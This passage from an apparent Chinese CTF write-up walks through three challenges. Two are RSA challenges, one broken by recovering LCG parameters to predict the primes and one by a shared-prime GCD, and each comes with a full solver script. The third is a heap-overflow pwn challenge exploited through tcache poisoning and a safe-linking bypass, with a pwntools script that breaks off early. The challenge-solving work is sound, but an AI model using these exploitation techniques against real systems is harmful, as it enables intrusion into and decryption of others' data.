<code>LCG<\/code>\u3002<\/li>\n\n\n\n<li>\u5148\u6cc4\u9732\u4e86\u8fde\u7eed\u7684 <code>10<\/code> \u4e2a\u72b6\u6001\u503c <code>leak<\/code>\u3002<\/li>\n\n\n\n<li>\u7136\u540e\u7b2c <code>11<\/code>\u3001<code>12<\/code> \u4e2a\u72b6\u6001\u5206\u522b\u7ecf\u8fc7 <code>next_prime<\/code> \u53d8\u6210 <code>p<\/code> \u548c <code>q<\/code>\u3002<\/li>\n\n\n\n<li>\u6700\u7ec8\u7528\u6807\u51c6 <code>RSA<\/code> \u8fdb\u884c\u52a0\u5bc6\u3002<\/li>\n<\/ol>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u610f\u5473\u7740\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><code>RSA<\/code> \u672c\u8eab\u5e76\u6ca1\u6709\u660e\u663e\u5f31\u70b9\uff1b<\/li>\n\n\n\n<li>\u771f\u6b63\u7684\u6f0f\u6d1e\u5728\u4e8e <code>p<\/code>\u3001<code>q<\/code> \u7684\u6765\u6e90\u662f\u53ef\u9884\u6d4b\u7684\uff1b<\/li>\n\n\n\n<li>\u53ea\u8981\u4ece\u6cc4\u9732\u4e2d\u6062\u590d\u51fa <code>LCG<\/code> \u53c2\u6570\uff0c\u5c31\u80fd\u7ee7\u7eed\u5f80\u540e\u63a8\u72b6\u6001\uff0c\u8fdb\u800c\u6062\u590d <code>p<\/code> \u548c <code>q<\/code>\u3002<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">\u6362\u53e5\u8bdd\u8bf4\uff0c\u8fd9\u9898\u7684\u672c\u8d28\u4e0d\u662f\u201c\u7206\u7834 RSA\u201d\uff0c\u800c\u662f\u201c\u9884\u6d4b\u751f\u6210 RSA \u7d20\u6570\u7684\u968f\u673a\u6e90\u201d\u3002<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"lcg-\u57fa\u7840\">LCG \u57fa\u7840<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u7ebf\u6027\u540c\u4f59\u751f\u6210\u5668\u5f62\u5f0f\u4e3a\uff1a x_{n+1} = (a x_n + b) mod m<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u5176\u4e2d\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><code>m<\/code> \u662f\u6a21\u6570<\/li>\n\n\n\n<li><code>a<\/code> \u662f\u4e58\u5b50<\/li>\n\n\n\n<li><code>b<\/code> \u662f\u589e\u91cf<\/li>\n\n\n\n<li><code>x_0<\/code> \u662f\u79cd\u5b50<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">\u5982\u679c <code>m, a, b, seed<\/code> \u90fd\u4fdd\u5bc6\uff0cLCG \u8868\u9762\u4e0a\u50cf\u662f\u201c\u968f\u673a\u201d\u7684\uff1b\u4f46\u4e00\u65e6\u8fde\u7eed\u8f93\u51fa\u6cc4\u9732\u8db3\u591f\u591a\uff0c\u53c2\u6570\u5f80\u5f80\u53ef\u4ee5\u76f4\u63a5\u6062\u590d\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u6b63\u662f LCG \u5728\u5bc6\u7801\u5b66\u91cc\u4e0d\u5b89\u5168\u7684\u6839\u672c\u539f\u56e0\uff1a\u5b83\u9002\u5408\u505a\u6a21\u62df\u3001\u62bd\u6837\u3001\u6e38\u620f\u903b\u8f91\uff0c\u4e0d\u9002\u5408\u751f\u6210\u5bc6\u94a5\u6750\u6599\u3002<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"\u653b\u51fb\u5207\u5165\u70b9\">\u653b\u51fb\u5207\u5165\u70b9<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u5df2\u77e5\u8fde\u7eed\u8f93\u51fa\uff1a<code>x0, x1, x2, ..., x9<\/code><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u5b9a\u4e49\u5dee\u5206\uff1a <code>d_i = x_{i+1} - x_i<\/code><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u5bf9\u4e8e LCG\uff0c\u53ef\u4ee5\u63a8\u51fa\u4e00\u4e2a\u975e\u5e38\u5173\u952e\u7684\u6052\u7b49\u5f0f\uff1a <code>d_{i+2} d_i - d_{i+1}^2 \u2261 0 (mod m)<\/code><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u4e5f\u5c31\u662f\u8bf4\uff0c\u4e0b\u9762\u8fd9\u4e9b\u503c\uff1a <code>t_i = d_{i+2} d_i - d_{i+1}^2<\/code><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u5168\u90e8\u90fd\u662f <code>m<\/code> \u7684\u500d\u6570\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u4e8e\u662f\u6211\u4eec\u53ef\u4ee5\uff1a<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>\u5148\u7b97\u51fa\u82e5\u5e72\u4e2a <code>t_i<\/code><\/li>\n\n\n\n<li>\u5bf9\u5b83\u4eec\u53d6 <code>gcd<\/code><\/li>\n\n\n\n<li>\u5927\u6982\u7387\u76f4\u63a5\u5f97\u5230\u6a21\u6570 <code>m<\/code><\/li>\n<\/ol>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u662f\u6062\u590d\u672a\u77e5 LCG \u6a21\u6570\u65f6\u7684\u7ecf\u5178\u505a\u6cd5\u3002<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"\u7b2c\u4e00\u6b65-\u6062\u590d\u6a21\u6570-m\">\u7b2c\u4e00\u6b65\uff1a\u6062\u590d\u6a21\u6570 <code>m<\/code><\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u8bbe\uff1a <code>d_i = x_{i+1} - x_i<\/code><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u7136\u540e\u8ba1\u7b97\uff1a <code>t_i = |d_{i+2} d_i - d_{i+1}^2|<\/code><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u518d\u53d6\uff1a m = gcd(t_0, t_1, t_2, \u2026)<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u5728\u672c\u9898\u4e2d\uff0c\u5f97\u5230\uff1a <code>m = 7875284624774766146779800993774894905100411788121896560125060768418290671778891426069143518962622717768183611843647982948139027846154094539521976137200947<\/code><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u662f\u4e00\u4e2a <code>512<\/code> \u4f4d\u6574\u6570\uff0c\u548c\u9898\u76ee\u89c4\u6a21\u5b8c\u5168\u5339\u914d\u3002<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"\u7b2c\u4e8c\u6b65-\u6062\u590d-a-\u548c-b\">\u7b2c\u4e8c\u6b65\uff1a\u6062\u590d <code>a<\/code> \u548c <code>b<\/code><\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">LCG \u6ee1\u8db3\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>    x2 \u2261 a x1 + b (mod m)\n    x1 \u2261 a x0 + b (mod m)<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u4e24\u5f0f\u76f8\u51cf\uff1a<code>x2 - x1 \u2261 a(x1 - x0) (mod m)<\/code><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u4e8e\u662f\uff1a <code>a \u2261 (x2 - x1) * (x1 - x0)^{-1} (mod m)<\/code><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u53ea\u8981 <code>x1 - x0<\/code> \u5728\u6a21 <code>m<\/code> \u4e0b\u53ef\u9006\uff0c\u5c31\u80fd\u6c42\u51fa <code>a<\/code>\u3002\u7136\u540e\u518d\u4ee3\u56de\uff1a b \u2261 x1 &#8211; a x0 (mod m)<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u672c\u9898\u6062\u590d\u5f97\u5230\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>    a = 4738825074520259956533037190684495177771755298763050091909140649381629606721221195682239040738122274360279582713489062229369777696853175440320242347711942\n    b = 4092912681671128018391178676001917712732854554289857666213004128629748648943621665932967507890089418337577391833454547542549491970398245151364856305238733<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u9a8c\u8bc1\u6240\u6709\u6cc4\u9732\u503c\u90fd\u6ee1\u8db3\u9012\u63a8\u5173\u7cfb\uff0c\u8bf4\u660e\u6062\u590d\u6210\u529f\u3002<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"\u7b2c\u4e09\u6b65-\u9884\u6d4b\u540e\u7eed\u72b6\u6001\">\u7b2c\u4e09\u6b65\uff1a\u9884\u6d4b\u540e\u7eed\u72b6\u6001<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u5df2\u77e5\u6700\u540e\u4e00\u4e2a\u6cc4\u9732\u503c <code>x9<\/code>\uff0c\u7ee7\u7eed\u9012\u63a8\uff1a x10 = (a x9 + b) mod m x11 = (a x10 + b) mod m<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u9898\u76ee\u4e2d\u8fd9\u4e24\u4e2a\u503c\u4e0d\u662f\u76f4\u63a5\u4f5c\u4e3a\u7d20\u6570\uff0c\u800c\u662f\uff1a p = next_prime(x10) q = next_prime(x11)<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u6240\u4ee5\u53ea\u8981\u7ee7\u7eed\u7b97\uff1a from sympy import nextprime p = nextprime(x10) q = nextprime(x11)<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u5c31\u80fd\u5f97\u5230\u771f\u6b63\u7684 <code>RSA<\/code> \u7d20\u6570\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u672c\u9898\u9a8c\u8bc1\u7ed3\u679c\uff1a p * q == n<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u6210\u7acb\uff0c\u8bf4\u660e <code>p<\/code>\u3001<code>q<\/code> \u5df2\u7ecf\u5b8c\u5168\u6062\u590d\u3002<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"\u7b2c\u56db\u6b65-\u5206\u89e3-rsa-\u5e76\u89e3\u5bc6\">\u7b2c\u56db\u6b65\uff1a\u5206\u89e3 RSA \u5e76\u89e3\u5bc6<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u65e2\u7136\u5df2\u7ecf\u62ff\u5230\u4e86 <code>p<\/code> \u548c <code>q<\/code>\uff0c\u63a5\u4e0b\u6765\u5c31\u662f\u6807\u51c6 RSA \u6d41\u7a0b\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>    phi(n) = (p - 1)(q - 1)\n    d = e^{-1} mod phi(n)\n    m = c^d mod n<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u518d\u628a\u6574\u6570\u8f6c\u56de\u5b57\u8282\u4e32\u5373\u53ef\uff1a flag = long_to_bytes(m)<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u6700\u7ec8\u5f97\u5230\uff1a LHFLAG{lcg_rsa_predictor_9f3a1c7e5b2d}<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"\u5b8c\u6574\u5229\u7528\u811a\u672c\">\u5b8c\u6574\u5229\u7528\u811a\u672c<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u4e0b\u9762\u7ed9\u51fa\u672c\u9898\u7684\u5b8c\u6574\u6c42\u89e3\u811a\u672c\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code>    from math import gcd\n    from functools import reduce\n    from sympy import nextprime\n    leak = &#91;\n        6985834086318513464582066760726949209670289780223924014189989314148020303714444205927413118671751493130743545190688298414543409085873510552656160506576256,\n        7282244412157875114308857740823652350341058188147469510808059192495360119191350036395015555471478559653925696086169517452309653330835642916888429465946211,\n        1002794114231128166816211135173410428216376972195397080313080012455988792692246515131492377985052655981575303475686765019210608716329061049962560828575363,\n        4477586192351759281760189220444819326589815568129221564121474666910601526393095724102777606325270387078962182371925781406702466696126872911917082111763043,\n        7322401749672927612275807633951831167111798827239752438748033792428144120871451046550505356056106291710791287610345186486997678338441869459415730747675848,\n        2453956094979835874287873434326477980661206136156942064592927844371687317510373129480180598842006452582062065904520211202668029697652843050740610127468086,\n        2740326586334566990787059605091870695062095329281857614935719484632956517014105314443239608159562804443460738565005726448350650224717812760949150171988534,\n        7585912819061763422117137229921075196465007521972780322503074449789602179953142181941295151842340199137511389403983042099433633144876922274802342307610422,\n        7315097688998032920087172453751035970700135831450471495603601439092292775843751317667155675236178109105737193209581466895128278458155386362803044961601480,\n        5997245726016350747947482111615966538840537804797068568851188109453752358541419295057794060476720587261258477381314231836964496783204739144606342473368443,\n    ]\n\n    n = 3457493176653935744329250989656750649327040804724658025768062867871700661799411336877305218669630736803860520092210770056572178058772166797062129524483539658137438065055112442175180768844050391404760307986176923967153987260311979398106896242548808983076228626704805648986994671173890832635179299147368481691\n    e = 65537\n    c = 1000647187097524621492135399992688567047890488977091487164941638610113163790388892932241499775799331256098676902803986758100100914983164467593532755127812962760275620307263921120028436805324458699970081490155784536893678338378009059929582417188211114450310835552298348248596105560838812370161012099089613190\n\n\n    def egcd(a, b):\n        if b == 0:\n            return a, 1, 0\n        g, x1, y1 = egcd(b, a % b)\n        return g, y1, x1 - (a \/\/ b) * y1\n\n\n    def inv(a, m):\n        g, x, _ = egcd(a, m)\n        if g != 1:\n            raise ValueError(\"inverse does not exist\")\n        return x % m\n\n\n    ds = &#91;leak&#91;i + 1] - leak&#91;i] for i in range(len(leak) - 1)]\n    ts = &#91;abs(ds&#91;i + 2] * ds&#91;i] - ds&#91;i + 1] * ds&#91;i + 1]) for i in range(len(ds) - 2)]\n    m = reduce(gcd, ts)\n\n    a = ((leak&#91;2] - leak&#91;1]) * inv(leak&#91;1] - leak&#91;0], m)) % m\n    b = (leak&#91;1] - a * leak&#91;0]) % m\n\n    x10 = (a * leak&#91;-1] + b) % m\n    x11 = (a * x10 + b) % m\n\n    p = int(nextprime(x10))\n    q = int(nextprime(x11))\n    assert p * q == n\n\n    phi = (p - 1) * (q - 1)\n    d = pow(e, -1, phi)\n    msg = pow(c, d, n)\n\n    flag = msg.to_bytes((msg.bit_length() + 7) \/\/ 8, \"big\")\n    print(flag.decode())<\/code><\/pre>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"\u89e3\u9898\u601d\u8def\u7684\u5173\u952e\u7f8e\u611f\">\u89e3\u9898\u601d\u8def\u7684\u5173\u952e\u7f8e\u611f<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u9898\u6700\u6709\u610f\u601d\u7684\u5730\u65b9\uff0c\u4e0d\u5728\u4e8e\u516c\u5f0f\u6709\u591a\u96be\uff0c\u800c\u5728\u4e8e\u7ed3\u6784\u5f88\u987a\uff1a<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li><code>LCG<\/code> \u672c\u8eab\u4e0d\u5b89\u5168\u3002<\/li>\n\n\n\n<li>\u8c03\u8bd5\u8f93\u51fa\u628a\u8fde\u7eed\u5185\u90e8\u72b6\u6001\u66b4\u9732\u4e86\u51fa\u6765\u3002<\/li>\n\n\n\n<li>\u8fde\u7eed\u72b6\u6001\u8db3\u591f\u6062\u590d\u968f\u673a\u6e90\u53c2\u6570\u3002<\/li>\n\n\n\n<li>\u968f\u673a\u6e90\u53c8\u76f4\u63a5\u53c2\u4e0e <code>RSA<\/code> \u7d20\u6570\u751f\u6210\u3002<\/li>\n\n\n\n<li>\u4e00\u65e6\u80fd\u9884\u6d4b\u540e\u7eed\u72b6\u6001\uff0c<code>RSA<\/code> \u7684\u201c\u4e0d\u53ef\u5206\u89e3\u6027\u201d\u5c31\u4e0d\u518d\u6210\u7acb\u3002<\/li>\n<\/ol>\n\n\n\n<p class=\"wp-block-paragraph\">\u5b83\u4e0d\u662f\u5355\u70b9\u5931\u8bef\uff0c\u800c\u662f\u201c\u5f31\u968f\u673a + \u8c03\u8bd5\u6cc4\u9732 + \u5bc6\u94a5\u751f\u6210\u4f9d\u8d56\u4f2a\u968f\u673a\u201d\u7684\u94fe\u5f0f\u5d29\u584c\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u7c7b\u9898\u5f88\u503c\u5f97\u8bb0\u4f4f\uff0c\u56e0\u4e3a\u771f\u5b9e\u573a\u666f\u91cc\uff0c\u5f88\u591a\u5bc6\u7801\u7cfb\u7edf\u5e76\u4e0d\u662f\u7b97\u6cd5\u672c\u8eab\u9519\u4e86\uff0c\u800c\u662f\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u968f\u673a\u6570\u4e0d\u591f\u968f\u673a\uff1b<\/li>\n\n\n\n<li>\u5185\u90e8\u72b6\u6001\u88ab\u65e5\u5fd7\u3001\u62a5\u9519\u3001\u8c03\u8bd5\u4fe1\u606f\u5e26\u51fa\u6765\uff1b<\/li>\n\n\n\n<li>\u5bc6\u94a5\u751f\u6210\u8def\u5f84\u548c\u5f31\u71b5\u6e90\u7ed1\u5b9a\u5f97\u592a\u7d27\u3002<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">\u7b97\u6cd5\u6ca1\u6709\u5012\u4e0b\uff0c\u5de5\u7a0b\u5b9e\u73b0\u5148\u5012\u4e0b\u4e86\u3002<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"\u590d\u76d8\u603b\u7ed3\">\u590d\u76d8\u603b\u7ed3<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u9898\u7684\u6838\u5fc3\u7ed3\u8bba\u53ef\u4ee5\u538b\u7f29\u6210\u4e00\u53e5\u8bdd\uff1a<\/p>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p class=\"wp-block-paragraph\">\u5f53 RSA \u7684\u7d20\u6570\u6765\u6e90\u53ef\u9884\u6d4b\u65f6\uff0c\u653b\u51fb\u8005\u6253\u7684\u5c31\u4e0d\u662f RSA\uff0c\u800c\u662f\u201c\u751f\u6210 RSA \u7684\u90a3\u53f0\u968f\u673a\u673a\u5668\u201d\u3002<\/p>\n<\/blockquote>\n\n\n\n<p class=\"wp-block-paragraph\">\u9700\u8981\u8bb0\u4f4f\u7684\u77e5\u8bc6\u70b9\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u8fde\u7eed LCG \u8f93\u51fa\u53ef\u6062\u590d\u6a21\u6570 <code>m<\/code><\/li>\n\n\n\n<li>\u518d\u7531\u540c\u4f59\u5173\u7cfb\u6062\u590d <code>a<\/code>\u3001<code>b<\/code><\/li>\n\n\n\n<li>\u6709\u4e86\u53c2\u6570\u5c31\u80fd\u7ee7\u7eed\u9884\u6d4b\u540e\u7eed\u72b6\u6001<\/li>\n\n\n\n<li><code>next_prime<\/code> \u4e0d\u4f1a\u63d0\u5347\u968f\u673a\u6027\uff0c\u53ea\u4f1a\u628a\u201c\u53ef\u9884\u6d4b\u6574\u6570\u201d\u53d8\u6210\u201c\u53ef\u9884\u6d4b\u7d20\u6570\u201d<\/li>\n\n\n\n<li>\u4e00\u65e6 <code>p<\/code>\u3001<code>q<\/code> \u53ef\u9884\u6d4b\uff0cRSA \u76f4\u63a5\u5931\u5b88<\/li>\n<\/ul>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"\u6700\u7ec8-flag\">\u6700\u7ec8 Flag<\/h4>\n\n\n\n<pre class=\"wp-block-code\"><code>LHFLAG{lcg_rsa_predictor_9f3a1c7e5b2d}<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"\u7b80\u5355\u7684rsa\">\u7b80\u5355\u7684RSA<\/h3>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p class=\"wp-block-paragraph\">\u6211\u6279\u91cf\u751f\u6210\u4e86\u5f88\u591a RSA \u516c\u94a5\uff0c\u5e76\u7528\u5176\u4e2d\u4e00\u4e2a\u516c\u94a5\u52a0\u5bc6\u4e86 flag\u3002<\/p>\n<\/blockquote>\n\n\n\n<p class=\"wp-block-paragraph\">10 \u4e2a RSA \u516c\u94a5 (e=65537)\uff0c\u5bc6\u6587\u7531 key04 \u52a0\u5bc6\u3002\u8ba1\u7b97 key04 \u7684 n \u4e0e\u5176\u4f59 n \u7684 GCD\uff0c\u53d1\u73b0\u4e0e key07 \u5171\u4eab\u7d20\u6570\u56e0\u5b50\uff0c\u4ece\u800c\u5206\u89e3\u6a21\u6570\u3001\u6062\u590d\u79c1\u94a5\u3001\u89e3\u5bc6\u5bc6\u6587\u3002<\/p>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"1-gcd-\u5206\u6790\">1: GCD \u5206\u6790<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u9898\u76ee\u7ed9\u51fa 10 \u4e2a RSA \u516c\u94a5\uff0c\u6240\u6709 e=65537\u3002\u82e5\u4efb\u610f\u4e24\u4e2a\u6a21\u6570\u5171\u4eab\u7d20\u6570\u56e0\u5b50 p\uff0c\u5219 <code>gcd(n_i, n_j) = p<\/code> \u53ef\u76f4\u63a5\u5206\u89e3\u4e24\u8005\u3002<\/p>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code>    import json\n    from math import gcd\n\n    with open('public_keys.json') as f:\n        keys = json.load(f)\n\n    ns = {k&#91;'id']: int(k&#91;'n'], 16) for k in keys}\n    n_target = ns&#91;'key04']\n    e = 65537\n\n    # gcd(key04, key07) \u5f97\u5230\u5171\u4eab\u56e0\u5b50\n    for kid, n in ns.items():\n        if kid == 'key04':\n            continue\n        g = gcd(n_target, n)\n        if g &gt; 1:\n            p = g\n            q = n_target \/\/ p\n            print(f\"Shared factor with {kid}: p = {p}\")\n            break\n\n    # \u8ba1\u7b97\u79c1\u94a5\u5e76\u89e3\u5bc6\n    phi = (p - 1) * (q - 1)\n    d = pow(e, -1, phi)\n\n    ciphertext = 0x6eb35a92f4e81124a404a3b4690465ca03c2659db76b3bd62dc294215feb1e23f6d2514f7770c44ffaf474024a3ad2b760167ac208dfc0228b69929ee5daf0632183cdc3e4e62d19872ba6aa161cde4726adf30c1b53b56d82c2a86e80842f29c904f1f5da0dd7b9db5797dad06219ed0ad2241a45de5bcac18772004668e4e3\n\n    m = pow(ciphertext, d, n_target)\n    flag = m.to_bytes((m.bit_length() + 7) \/\/ 8, 'big').decode()\n    print(flag)<\/code><\/pre>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"\u5f97\u5230flag\">\u5f97\u5230Flag<\/h4>\n\n\n\n<pre class=\"wp-block-code\"><code>LHFLAG{GCD_RSA_SHARED_PRIME_9f3a2c}<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"pwn\">PWN<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"\u83dc\u5355\u5f88\u7f8e\u5473\">\u83dc\u5355\u5f88\u7f8e\u5473<\/h3>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p class=\"wp-block-paragraph\">\u6e2f\u53e3\u7684\u8001\u65e7\u8d27\u8fd0\u6253\u5305\u7cfb\u7edf\u6700\u8fd1\u521a\u4ece\u7eb8\u8d28\u53f0\u8d26\u8fc1\u5230\u7ec8\u7aef\u670d\u52a1\uff0c\u4f46\u8d1f\u8d23\u8fc1\u79fb\u7684\u627f\u5305\u5546\u663e\u7136\u6ca1\u628a\u5185\u5b58\u5b89\u5168\u5f53\u56de\u4e8b\u3002\u4f60\u62ff\u5230\u4e86\u4e00\u4efd\u7528\u4e8e\u7ba1\u7406\u8d27\u8fd0\u6e05\u5355\u7684\u4e8c\u8fdb\u5236\u670d\u52a1\uff0c\u73b0\u573a\u73af\u5883\u53ea\u5f00\u653e\u4e86\u4e00\u4e2a TCP \u7aef\u53e3\uff0c\u7ba1\u7406\u5458\u58f0\u79f0\u201c\u83dc\u5355\u5f88\u7b80\u5355\uff0c\u6309\u63d0\u793a\u64cd\u4f5c\u5c31\u597d\u201d\u3002 \u4f60\u7684\u76ee\u6807\u662f\u5ba1\u8ba1\u8fd9\u4e2a\u83dc\u5355\u9a71\u52a8\u7a0b\u5e8f\uff0c\u627e\u51fa\u5176\u4e2d\u7684\u5185\u5b58\u7ba1\u7406\u7f3a\u9677\uff0c\u5e76\u6700\u7ec8\u83b7\u53d6\u670d\u52a1\u7aef\u7684 flag\u3002<\/p>\n<\/blockquote>\n\n\n\n<p class=\"wp-block-paragraph\">Harbor Packer \u662f\u4e00\u4e2a\u8d27\u8fd0\u6e05\u5355\u7ba1\u7406\u4e8c\u8fdb\u5236\u7a0b\u5e8f\uff08x86-64, Full RELRO, No Canary, No PIE\uff09\u3002<code>repack_cargo<\/code> \u51fd\u6570\u5728\u8ba1\u7b97\u65b0 manifest \u5927\u5c0f\u65f6\u5c06 <code>segments * 32<\/code> \u622a\u65ad\u4e3a\u4f4e 8 \u4f4d\u4f20\u7ed9 <code>malloc()<\/code>\uff0c\u4f46 <code>read_exact()<\/code> \u4f7f\u7528\u5b8c\u6574\u503c\u8bfb\u53d6\u6570\u636e\uff0c\u5bfc\u81f4\u5806\u6ea2\u51fa\u3002\u5229\u7528\u6ea2\u51fa\u8fdb\u884c tcache poisoning\uff08\u7ed5\u8fc7 safe-linking\uff09\uff0c\u8986\u5199\u51fd\u6570\u6307\u9488\u4e3a <code>win<\/code> \u5730\u5740\u83b7\u53d6 flag\u3002<\/p>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"1-\u6f0f\u6d1e\u5b9a\u4f4d\">1: \u6f0f\u6d1e\u5b9a\u4f4d<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\"><code>repack_cargo<\/code> \u4e2d <code>repack<\/code> \u8c03\u7528 <code>malloc(low_byte)<\/code> \u5206\u914d\u65b0 manifest\uff0c\u968f\u540e <code>read_exact(ptr, segments * 32)<\/code> \u5199\u5165\u5b8c\u6574\u6570\u636e\uff1a segments=9 \u2192 9*32=288=0x120, low_byte=0x20 \u2192 malloc(0x20) \u2192 0x30 chunk, \u4f46\u8bfb\u5165 288 \u5b57\u8282<\/p>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"2-heap-leak-tcache-\u5e03\u5c40\">2: Heap Leak + Tcache \u5e03\u5c40<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u901a\u8fc7 <code>inspect<\/code> \u6cc4\u9732 manifest \u5806\u5730\u5740\u3002\u521b\u5efa\u5e76 scrap \u4e24\u4e2a size=0x20 \u7684 slot\uff0c\u4f7f 4 \u4e2a 0x30 chunk \u8fdb\u5165 tcache idx 1\u3002\u4fdd\u7559\u4e00\u4e2a slot 0 \u4f9b repack \u89e6\u53d1\u6ea2\u51fa\u3002<\/p>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"3-safe-linking-\u7ed5\u8fc7\">3: Safe-linking \u7ed5\u8fc7<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">glibc 2.38 \u5b89\u5168\u94fe\u63a5\u4fdd\u62a4\uff1a<code>stored_fd = target ^ (chunk_addr &gt;&gt; 12)<\/code>\u3002\u4f7f\u7528\u6cc4\u9732\u7684\u5806\u5730\u5740\u8ba1\u7b97\u6b63\u786e\u7684 mangled fd\uff0c\u8986\u5199 tcache \u4e2d\u88ab free chunk \u7684 fd \u6307\u9488\u6307\u5411 BSS \u4e2d\u7684\u51fd\u6570\u6307\u9488\u533a\u57df <code>0x404020<\/code>\u3002<\/p>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"4-arbitrary-write-win\">4: Arbitrary Write + Win<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fde\u7eed\u4e24\u6b21 <code>malloc(0x20)<\/code>\uff1a\u7b2c\u4e00\u6b21\u5f39\u51fa\u6b63\u5e38 chunk\uff0c\u7b2c\u4e8c\u6b21\u5f39\u51fa\u88ab\u6c61\u67d3\u7684 <code>0x404020<\/code>\u3002<code>read_exact<\/code> \u5c06 <code>win<\/code> \u5730\u5740 <code>0x401c35<\/code> \u5199\u5165\u51fd\u6570\u6307\u9488\u3002\u83dc\u5355\u9009\u9879 5\uff08Exit\uff09\u95f4\u63a5\u8c03\u7528\u88ab\u8986\u5199\u7684\u51fd\u6570\u6307\u9488 \u2192 <code>win()<\/code> \u2192 \u6253\u5370 <code>\/flag<\/code>\u3002<\/p>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code>    from pwn import *\n    import re\n\n    context.arch = 'amd64'\n    elf = ELF('harbor_packer')\n    win_addr = elf.symbols&#91;'win']       # 0x401c35\n    target_ptr = 0x404020               # 16-byte aligned, func ptr at +8\n\n    r = remote('nc1.ctfplus.cn', 35551)\n    r.recvuntil(b'&gt;')\n\n    def create(slot, size, tag, data):\n        r.sendline(b'1'); 